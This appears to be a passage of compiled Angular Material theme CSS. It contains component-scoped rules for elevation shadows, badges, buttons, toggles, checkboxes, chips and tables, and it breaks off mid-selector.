.mat-primary[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.mat-warn[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-warn[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#b0b0b0}.mat-app-background[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.mat-autocomplete-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-autocomplete-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:white}.mat-autocomplete-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#000000de}.mat-badge[_ngcontent-%COMP%]{position:relative}.mat-badge.mat-badge[_ngcontent-%COMP%]{overflow:visible}.mat-badge-hidden[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{display:none}.mat-badge-content[_ngcontent-%COMP%]{position:absolute;text-align:center;display:inline-block;border-radius:50%;transition:transform .2s ease-in-out;transform:scale(.6);overflow:hidden;white-space:nowrap;text-overflow:ellipsis;pointer-events:none}.ng-animate-disabled[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%], .mat-badge-content._mat-animation-noopable[_ngcontent-%COMP%]{transition:none}.mat-badge-content.mat-badge-active[_ngcontent-%COMP%]{transform:none}.mat-badge-small[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{width:16px;height:16px;line-height:16px}.mat-badge-small.mat-badge-above[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{top:-8px}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{bottom:-8px}.mat-badge-small.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-16px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-small.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-16px}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-16px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-small.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-16px}.mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-8px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-8px}.mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-8px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-8px}.mat-badge-medium[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{width:22px;height:22px;line-height:22px}.mat-badge-medium.mat-badge-above[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{top:-11px}.mat-badge-medium.mat-badge-below[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{bottom:-11px}.mat-badge-medium.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-22px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-medium.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-22px}.mat-badge-medium.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-22px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-medium.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-22px}.mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-11px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-11px}.mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-11px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-11px}.mat-badge-large[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{width:28px;height:28px;line-height:28px}.mat-badge-large.mat-badge-above[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{top:-14px}.mat-badge-large.mat-badge-below[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{bottom:-14px}.mat-badge-large.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-28px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-large.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-28px}.mat-badge-large.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-28px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-large.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-28px}.mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:-14px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-14px}.mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-14px}[dir=rtl][_ngcontent-%COMP%] .mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-14px}.mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.mat-badge-accent[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-badge-warn[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.mat-badge-disabled[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{background:#b5b5b5;color:#00000061}.mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:white;color:#000000de}.mat-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.mat-button.mat-primary[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.mat-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.mat-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.mat-button-focus-overlay[_ngcontent-%COMP%]{background:black}.mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#0000001f}.mat-flat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{color:#000000de;background-color:#fff}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#0000001f}.mat-flat-button.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.mat-button-toggle[_ngcontent-%COMP%]{color:#00000061}.mat-button-toggle[_ngcontent-%COMP%] .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#0000001f}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de;background:white}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#000}.mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #e0e0e0}[dir=rtl][_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #e0e0e0}.mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #e0e0e0}.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#0000008a}.mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de}.mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#00000042;background-color:#eee}.mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:white}.mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#bdbdbd}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #e0e0e0}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle-label-content[_ngcontent-%COMP%]{line-height:48px}.mat-card[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-card-subtitle[_ngcontent-%COMP%]{color:#0000008a}.mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#0000008a}.mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#f5f5f5}.mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#f5f5f5!important}.mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#f5f5f5}.mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked) .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%] .mat-checkbox-label[_ngcontent-%COMP%]{color:#00000061}.mat-checkbox[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn .mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#000000de}.mat-chip.mat-standard-chip[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#000000de;opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled) .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:black}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-table[_ngcontent-%COMP%]{background:white}.mat-table[_ngcontent-%COMP%] thead[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%] tbody[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%] tfoot[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], mat-row[_ngcontent-%COMP%], mat-footer-row[_ngcontent-%COMP%], [mat-header-row][_ngcontent-%COMP%], [mat-row][_ngcontent-%COMP%], [mat-footer-row][_ngcontent-%COMP%], .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}mat-row[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], 